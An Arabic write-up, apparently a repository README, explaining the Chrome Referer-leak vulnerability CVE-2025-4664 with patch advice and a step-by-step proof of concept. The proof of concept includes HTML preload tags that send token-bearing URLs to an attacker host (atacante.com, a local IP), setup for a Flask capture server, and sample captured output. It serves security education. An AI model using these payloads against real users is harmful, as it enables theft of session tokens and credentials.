
إن ثغرة CVE-2025-4664 هي خلل أمني عالي الخطورة تم تحديده في مكوّن Loader في متصفح Google Chrome، في الإصدارات الأقدم من 136.0.7103.113. تتيح هذه المشكلة لمهاجم عن بُعد تسريب بيانات عبر المنشأ (cross-origin) من خلال صفحة HTML مصممة خصيصًا، مما قد يعرض معلومات حساسة مثل رموز الجلسة أو بيانات المصادقة للخطر.
يكمن الخلل في تنفيذ غير ملائم لسياسات الأمان في مكوّن Loader في Chrome. تحديدًا، يفسّر Chrome توجيه referrer-policy داخل ترويسة HTTP Link في طلبات الموارد الفرعية (مثل الصور أو البرامج النصية)، حتى عندما لا تفعل المتصفحات الأخرى ذلك. يمكن للمهاجم استغلال ذلك عن طريق تعيين سياسة أقل تقييدًا، مثل unsafe-url، مما يؤدي إلى تسريب Chrome لعناوين URL كاملة، بما في ذلك المعاملات الحساسة، إلى نطاقات يسيطر عليها المهاجم.
تم استغلال هذه الثغرة بنشاط في بيئات حقيقية، مما دفع وكالة الأمن السيبراني وأمن البنية التحتية الأمريكية (CISA) إلى إدراجها في كتالوج الثغرات المعروفة والمستغلة (KEV). حددت CISA تاريخ 5 يونيو 2025 كموعد نهائي للوكالات الفيدرالية لتطبيق التصحيحات المناسبة.
أصدرت Google تحديثات لتصحيح هذه الثغرة في الإصدارات التالية:
يُنصح بشدة جميع المستخدمين بتحديث متصفح Chrome إلى أحدث إصدار متاح. للتحقق من التحديث وتطبيقه:
بالإضافة إلى ذلك، يجب على مستخدمي المتصفحات المبنية على Chromium، مثل Microsoft Edge وBrave وOpera وVivaldi، متابعة التحديثات المقابلة، حيث قد تتأثر بهذه الثغرة.
الحفاظ على تحديث المتصفح أمر ضروري للحماية من التهديدات الأمنية النشطة وحماية المعلومات الشخصية.
تُستغل الثغرة CVE-2025-4664 من خلال التلاعب بالطريقة التي يتعامل بها Google Chrome مع سياسة المرجع (referrer-policy) عند تحميل الموارد الفرعية (مثل الصور والبرامج النصية وغيرها) من روابط HTML.
🌐 إنشاء موقع خبيث:
ينشئ المهاجم موقع ويب يتضمن رابط HTML مثل هذا في ترويسة HTTP الخاصة به:
<link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
🔧 التلاعب بـ referrer-policy:
في معظم المتصفحات، لا يتم تطبيق سياسة الإحالة هذه في وسم <link> على المورد المُحمَّل. ومع ذلك، يطبّقه Chrome، وهذا هو جوهر المشكلة.
📤 تسريب الـ Referer: عندما يقوم متصفح الضحية (Chrome) بتحميل المورد من victima.com، يرسل عنوان URL الكامل للموقع المصدر كترويسة Referer، وقد يتضمن ذلك:
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">
عندما يصل الضحية إلى هذا المورد، يرسل Chrome عنوان URL الكامل الخاص به كـ Referer إلى خادم المهاجم.
1- يرسل المهاجم إلى الضحية رابطًا إلى:
https://atacante.com/pagina-maliciosa.html
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
Referer: https://victima.com/perfil?token=ABC123
إلى نطاق المهاجم، مما يعرّض الرمز.

index.html — ملف الضحيةهذا الملف يحاكي ضحية الهجوم، وهو عرض توضيحي مبسّط بصيغة HTML لإظهار كيفية استغلال ثغرة CVE-2025-4664 باستخدام وسم <link> خبيث:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
<link rel="preload" as="image"
href="https://victima.com/perfil?token=ABC123"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
<p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>
<link> لتحميل صورة مسبقًا من victima.com مع رمز في عنوان URL.referrerpolicy="unsafe-url"، سيرسل Chrome عنوان URL الكامل للصفحة الحالية كـ Referer إلى نطاق الضحية.servidor_atacante.py — ملف المهاجمباستخدام هذا السكربت يمكن أتمتة الهجوم لالتقاط الـ Referer عبر خادم صغير بلغة Python. إليك مثال باستخدام Flask لمحاكاة خادم المهاجم الذي يستقبل البيانات:
index.html.pip install flask
python servidor_atacante.py
<link rel="preload" as="image"
href="http://<tu_IP>:8080/captura.jpg"
referrerpolicy="unsafe-url">
استبدل <tu_IP> بعنوان IP العام أو المحلي للخادم الذي يشغّل السكربت.
افتح طرفية (PowerShell أو CMD).
انتقل إلى مجلد الملف:
cd "C:\Users\Sebas\Desktop\servidor_atacante"
python servidor_atacante.py
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080
في نفس المجلد (C:\Users\Sebas\Desktop\servidor_atacante)، أنشئ ملفًا باسم index.html بالمحتوى التالي:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Simula el ataque -->
<link rel="preload" as="image"
href="http://192.168.1.35:8080/captura.jpg"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Simulación CVE-2025-4664</h1>
<p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>
✅ مهم: تأكد من أن عنوان IP (192.168.1.35) يطابق ما يعرضه Flask كعنوان IP محلي. إذا كان مختلفًا، غيّره في ملف HTML.
افتح Chrome.
في شريط العناوين، اكتب:
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
اضغط Enter.
📥 مشاهدة النتيجة على الخادم في وحدة تحكم Flask يجب أن ترى شيئًا مثل:
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
[المجلد الهدف]: قم بتعديل هذا المعامل إلى المكان الذي حفظت فيه الملف.
🎯 هذا يعني أن المتصفح أرسل الـ Referer الكامل إلى المهاجم!
شرح من إعداد Sebastian Peinador لأغراض تعليمية وبحثية في مجال الأمن السيبراني الهجومي.
يتم توزيع هذه المواد بموجب ترخيص MIT.
إذا وجدت هذا مفيدًا، لا تنسَ منح ⭐ للمستودع أو مشاركته!